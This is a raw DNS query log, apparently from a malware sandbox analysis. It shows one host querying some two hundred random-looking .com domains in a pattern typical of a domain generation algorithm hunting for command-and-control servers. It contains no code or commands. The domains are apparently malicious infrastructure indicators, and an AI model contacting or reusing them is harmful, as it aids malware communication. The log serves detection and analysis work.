                                                                                                                                                                                                              Nov 11, 2024 18:33:50.642348051 CET192.168.2.81.1.1.10x9ea4Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.643064022 CET192.168.2.81.1.1.10x6343Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647330046 CET192.168.2.81.1.1.10x4ecStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647490025 CET192.168.2.81.1.1.10xcc15Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.647638083 CET192.168.2.81.1.1.10xb649Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.648025036 CET192.168.2.81.1.1.10x4596Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.650038958 CET192.168.2.81.1.1.10x11c7Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.848454952 CET192.168.2.81.1.1.10xa6d4Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:51.589240074 CET192.168.2.81.1.1.10x4ca9Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.579353094 CET192.168.2.81.1.1.10x6cc3Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.586690903 CET192.168.2.81.1.1.10x1bc3Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.596683025 CET192.168.2.81.1.1.10x46ebStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.607769966 CET192.168.2.81.1.1.10x5cb8Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.608661890 CET192.168.2.81.1.1.10x19ebStandard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.616175890 CET192.168.2.81.1.1.10xc542Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.625611067 CET192.168.2.81.1.1.10x1f3cStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.634088039 CET192.168.2.81.1.1.10xd156Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.634263039 CET192.168.2.81.1.1.10xe113Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.651223898 CET192.168.2.81.1.1.10x5967Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.677130938 CET192.168.2.81.1.1.10x6d83Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.718178034 CET192.168.2.81.1.1.10x807eStandard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.748466015 CET192.168.2.81.1.1.10xcfa1Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.766243935 CET192.168.2.81.1.1.10xd414Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767235994 CET192.168.2.81.1.1.10x6d75Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767908096 CET192.168.2.81.1.1.10x9eb5Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770308018 CET192.168.2.81.1.1.10x1646Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770662069 CET192.168.2.81.1.1.10x2e58Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.772783995 CET192.168.2.81.1.1.10x2664Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.776225090 CET192.168.2.81.1.1.10x83c3Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.777190924 CET192.168.2.81.1.1.10xa5dStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.778366089 CET192.168.2.81.1.1.10xb755Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780636072 CET192.168.2.81.1.1.10x4844Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.803929090 CET192.168.2.81.1.1.10xb891Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804111958 CET192.168.2.81.1.1.10x5fdbStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804279089 CET192.168.2.81.1.1.10xba29Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804447889 CET192.168.2.81.1.1.10xce40Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804913044 CET192.168.2.81.1.1.10x82b3Standard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.805964947 CET192.168.2.81.1.1.10x53deStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.806129932 CET192.168.2.81.1.1.10xbdb3Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.817399979 CET192.168.2.81.1.1.10xc050Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.825318098 CET192.168.2.81.1.1.10x4a35Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826069117 CET192.168.2.81.1.1.10xcd1fStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826222897 CET192.168.2.81.1.1.10x9a0dStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826384068 CET192.168.2.81.1.1.10xfc5aStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826529980 CET192.168.2.81.1.1.10xca52Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826680899 CET192.168.2.81.1.1.10x4946Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826821089 CET192.168.2.81.1.1.10x28f8Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826981068 CET192.168.2.81.1.1.10xb32Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827120066 CET192.168.2.81.1.1.10xceStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827286005 CET192.168.2.81.1.1.10x328fStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827455044 CET192.168.2.81.1.1.10x783fStandard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828109980 CET192.168.2.81.1.1.10xb080Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828268051 CET192.168.2.81.1.1.10x1212Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828433990 CET192.168.2.81.1.1.10x3180Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.830014944 CET192.168.2.81.1.1.10x2a0dStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.830384016 CET192.168.2.81.1.1.10xc6eeStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.831708908 CET192.168.2.81.1.1.10x95a3Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.853420973 CET192.168.2.81.1.1.10x4257Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861439943 CET192.168.2.81.1.1.10xd613Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861692905 CET192.168.2.81.1.1.10x9063Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.863432884 CET192.168.2.81.1.1.10x8bc4Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.863595009 CET192.168.2.81.1.1.10xb8beStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864159107 CET192.168.2.81.1.1.10xa108Standard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864332914 CET192.168.2.81.1.1.10x100eStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864695072 CET192.168.2.81.1.1.10x2901Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864861965 CET192.168.2.81.1.1.10x37f4Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.871301889 CET192.168.2.81.1.1.10xd763Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872353077 CET192.168.2.81.1.1.10x6181Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872519970 CET192.168.2.81.1.1.10x7627Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872664928 CET192.168.2.81.1.1.10xf2a2Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872806072 CET192.168.2.81.1.1.10x9957Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872944117 CET192.168.2.81.1.1.10x7582Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873269081 CET192.168.2.81.1.1.10x8aa3Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.454972982 CET192.168.2.81.1.1.10xfc56Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.466373920 CET192.168.2.81.1.1.10x920eStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.466470957 CET192.168.2.81.1.1.10x90fStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.479986906 CET192.168.2.81.1.1.10x6f94Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.481945038 CET192.168.2.81.1.1.10xf6e8Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.510628939 CET192.168.2.81.1.1.10x2f88Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.511388063 CET192.168.2.81.1.1.10xa065Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.516500950 CET192.168.2.81.1.1.10x3bd5Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.518224955 CET192.168.2.81.1.1.10x56aeStandard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.518476963 CET192.168.2.81.1.1.10xbe5aStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.527543068 CET192.168.2.81.1.1.10x24d3Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.542447090 CET192.168.2.81.1.1.10xe2f6Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.734996080 CET192.168.2.81.1.1.10x3bbeStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.738420010 CET192.168.2.81.1.1.10x80f5Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.745171070 CET192.168.2.81.1.1.10x4dc1Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.750967026 CET192.168.2.81.1.1.10x3326Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.773930073 CET192.168.2.81.1.1.10x42cbStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.774075985 CET192.168.2.81.1.1.10x5088Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.787606001 CET192.168.2.81.1.1.10x470dStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:55.787775040 CET192.168.2.81.1.1.10x146Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.789690971 CET192.168.2.81.1.1.10x68c2Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:56.789906979 CET192.168.2.81.1.1.10x5921Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.614293098 CET192.168.2.81.1.1.10xa1d9Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.665174961 CET192.168.2.81.1.1.10x87e1Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.665575027 CET192.168.2.81.1.1.10x3585Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.666532993 CET192.168.2.81.1.1.10x899Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.666564941 CET192.168.2.81.1.1.10x9cb1Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.696042061 CET192.168.2.81.1.1.10x95e1Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:57.720276117 CET192.168.2.81.1.1.10x4896Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:59.557830095 CET192.168.2.81.1.1.10x881dStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:59.729517937 CET192.168.2.81.1.1.10xb120Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.324040890 CET192.168.2.81.1.1.10xf658Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.558505058 CET192.168.2.81.1.1.10x7d01Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:02.717338085 CET192.168.2.81.1.1.10x40d2Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.269824982 CET192.168.2.81.1.1.10x52a2Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.402218103 CET192.168.2.81.1.1.10x5a77Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.593575001 CET192.168.2.81.1.1.10xa057Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.671083927 CET192.168.2.81.1.1.10x50e6Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.715966940 CET192.168.2.81.1.1.10xf098Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.716207981 CET192.168.2.81.1.1.10x6bf5Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.721813917 CET192.168.2.81.1.1.10x7f40Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.748831034 CET192.168.2.81.1.1.10xea12Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.766418934 CET192.168.2.81.1.1.10x635Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.766752005 CET192.168.2.81.1.1.10xba99Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.766976118 CET192.168.2.81.1.1.10x71bdStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.925510883 CET192.168.2.81.1.1.10x2285Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.928391933 CET192.168.2.81.1.1.10x5275Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.928704977 CET192.168.2.81.1.1.10xf31bStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.933183908 CET192.168.2.81.1.1.10x5533Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.947602987 CET192.168.2.81.1.1.10x1fStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.948223114 CET192.168.2.81.1.1.10x9964Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:03.969744921 CET192.168.2.81.1.1.10x9d65Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.043672085 CET192.168.2.81.1.1.10xb078Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.047482967 CET192.168.2.81.1.1.10xe5a2Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.052838087 CET192.168.2.81.1.1.10xe41cStandard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.063697100 CET192.168.2.81.1.1.10x4620Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.067842960 CET192.168.2.81.1.1.10xda25Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.068061113 CET192.168.2.81.1.1.10xeeabStandard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.068506002 CET192.168.2.81.1.1.10xcc66Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.075615883 CET192.168.2.81.1.1.10xde0cStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.078896046 CET192.168.2.81.1.1.10xf703Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.079724073 CET192.168.2.81.1.1.10x76e7Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.085325956 CET192.168.2.81.1.1.10x1b80Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.090215921 CET192.168.2.81.1.1.10x4d69Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120433092 CET192.168.2.81.1.1.10xd2f8Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120722055 CET192.168.2.81.1.1.10x889cStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120997906 CET192.168.2.81.1.1.10x30a7Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121167898 CET192.168.2.81.1.1.10x2b35Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121611118 CET192.168.2.81.1.1.10x8b63Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121794939 CET192.168.2.81.1.1.10x5edcStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124286890 CET192.168.2.81.1.1.10xf757Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124547958 CET192.168.2.81.1.1.10x9085Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124799013 CET192.168.2.81.1.1.10x4e97Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124964952 CET192.168.2.81.1.1.10x1dd1Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125344992 CET192.168.2.81.1.1.10xd694Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125513077 CET192.168.2.81.1.1.10x29fStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.146256924 CET192.168.2.81.1.1.10xfbe0Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148139000 CET192.168.2.81.1.1.10xb96bStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148644924 CET192.168.2.81.1.1.10x8d99Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148873091 CET192.168.2.81.1.1.10xc91cStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149293900 CET192.168.2.81.1.1.10x6250Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149471998 CET192.168.2.81.1.1.10xdf60Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.159881115 CET192.168.2.81.1.1.10x5ec8Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.160115957 CET192.168.2.81.1.1.10xf601Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.160507917 CET192.168.2.81.1.1.10x8443Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.164937973 CET192.168.2.81.1.1.10x921cStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165186882 CET192.168.2.81.1.1.10xf9a4Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165635109 CET192.168.2.81.1.1.10xf5b1Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.165906906 CET192.168.2.81.1.1.10x5910Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166157961 CET192.168.2.81.1.1.10x133dStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166404009 CET192.168.2.81.1.1.10xc6d6Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166570902 CET192.168.2.81.1.1.10x918bStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.166949987 CET192.168.2.81.1.1.10x9292Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167104006 CET192.168.2.81.1.1.10x6630Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167370081 CET192.168.2.81.1.1.10xe56cStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167567968 CET192.168.2.81.1.1.10x507Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.167823076 CET192.168.2.81.1.1.10x69ddStandard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.168941021 CET192.168.2.81.1.1.10x3115Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182235956 CET192.168.2.81.1.1.10xbe42Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182663918 CET192.168.2.81.1.1.10x7867Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.182862997 CET192.168.2.81.1.1.10x1bdaStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.188446999 CET192.168.2.81.1.1.10x3de9Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.194978952 CET192.168.2.81.1.1.10x364aStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195194006 CET192.168.2.81.1.1.10x130bStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.195895910 CET192.168.2.81.1.1.10x58c6Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.196404934 CET192.168.2.81.1.1.10xc74Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.886164904 CET192.168.2.81.1.1.10x8b63Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.886851072 CET192.168.2.81.1.1.10xd28Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.920212030 CET192.168.2.81.1.1.10x62d5Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.142472982 CET192.168.2.81.1.1.10x1096Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
